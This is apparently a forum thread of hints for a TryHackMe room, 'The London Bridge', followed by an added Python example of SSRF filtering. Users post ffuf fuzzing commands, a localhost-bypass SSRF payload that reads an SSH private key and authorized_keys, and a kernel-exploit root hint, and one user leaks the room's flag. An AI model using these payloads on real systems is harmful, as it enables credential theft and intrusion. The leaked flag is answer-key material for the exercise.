Let’s talk about The London Bridge
Any hints for foothold?
Try fuzzing POST parameters for the /view_image URL. Once you find the parameter, you need to figure out how to use it to get a shell.
Finally got root! By an unintended way.
It’d be great if you share some hints from initial foothold to getting root.
Yeah, that was my 2nd acc.
Foothold:
Try parameter fuzzing on the /view_image file, not on the URL but on the POST data, like imageurl=test&FUZZ=test
If some wordlists don't work, try another; you will end up finding it. The parameter will lead you to SSRF. Try port scanning the server's localhost, but localhost is being blocked, so find some localhost bypass on PayloadsAllTheThings and you will find the open port. Do dirbusting on the open port and you will end up finding the id_rsa (use big.txt).
Root:
I got root using an unintended path; this machine has a kernel exploit that you can find on GitHub. The pkexec one doesn't work as it is not installed.
What is the unintended way?
I'm using this with several wordlists and nothing, maybe I'm missing something?
ffuf -u "http://10.10.115.233:8080/view_image" -w /usr/share/wordlists/params -d "imageurl=test&FUZZ=test" -X POST -fs 823
And how did you find out that it was param fuzzing??
I’m fkt with this machine
I used this command but no result.
ffuf -w httparchive_parameters_top_1m_2024_05_28.txt -u http://<MachineIP>:8080/view_image -X POST -d 'imageurl=test&FUZZ=http://<MY_IP>' -fs 823
I have seen with Burp that imageurl is actually image_url, but changing it in the ffuf command still isn't working. I have tried to fuzz that param too and nothing.
Don’t frustrate yourself. A public write-up will be available very soon.
For anyone still stuck with the POST parameter for /view_image, it's www
this room is frustrating
How did u fuzz it? I'm sure www was in all of my wordlists
Create your payloads like this to send requests to localhost:
www=http://0:80
To get id_rsa:
www=http://0:80/.ssh/id_rsa
username: beth
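As an added example (not from this thread or the room), the defender's view of the hint above: a string blocklist that rejects "localhost" is bypassed by aliases such as `0`, while a check that resolves the host and tests the resulting addresses is not. The blocklist contents are an assumption about what such an app does, not anything confirmed about the room.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Assumed contents of a naive string blocklist; not taken from the room.
BLOCKED_HOSTS = {"localhost", "127.0.0.1"}


def weak_is_allowed(url: str) -> bool:
    """String-match blocklist: rejects 'localhost' but not aliases like '0'."""
    host = (urlsplit(url).hostname or "").lower()
    return host not in BLOCKED_HOSTS


def resolve_host(host: str) -> list:
    """Resolve a host (or numeric form such as '0' or '127.1') to IP addresses.

    Numeric forms are parsed locally by getaddrinfo, so these cases need no DNS.
    """
    try:
        infos = socket.getaddrinfo(host, None)
    except (socket.gaierror, UnicodeError):
        return []
    return [ipaddress.ip_address(info[4][0]) for info in infos]


def strict_is_allowed(url: str) -> bool:
    """Allow only http(s) URLs whose host resolves exclusively to global addresses.

    Loopback, unspecified (0.0.0.0), private, link-local and reserved destinations
    are refused regardless of how the host was spelled.  Pin the resolved address
    when fetching so a later DNS answer cannot redirect the request.
    """
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    addrs = resolve_host(parts.hostname)
    return bool(addrs) and all(addr.is_global for addr in addrs)


if __name__ == "__main__":
    # Constructed sample inputs: the alias from the thread and a few numeric hosts.
    for sample in ("http://0:80/.ssh/id_rsa", "http://localhost/",
                   "http://127.0.0.1/", "http://[::1]/", "http://1.2.3.4/"):
        print(f"{sample:32} weak={weak_is_allowed(sample)!s:5} "
              f"strict={strict_is_allowed(sample)}")
```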
Hi, how did you find the beth user? Bruteforce?
No, beth is found here.
www=http://0:80/.ssh/authorized_keys
THM{l0n6_l1v3_7h3_qu33n}
Just submit the flag and move on. Don't even think about solving this challenge. THM challenges are nothing but pointless puzzles that only waste your time. Will share the root flag tomorrow.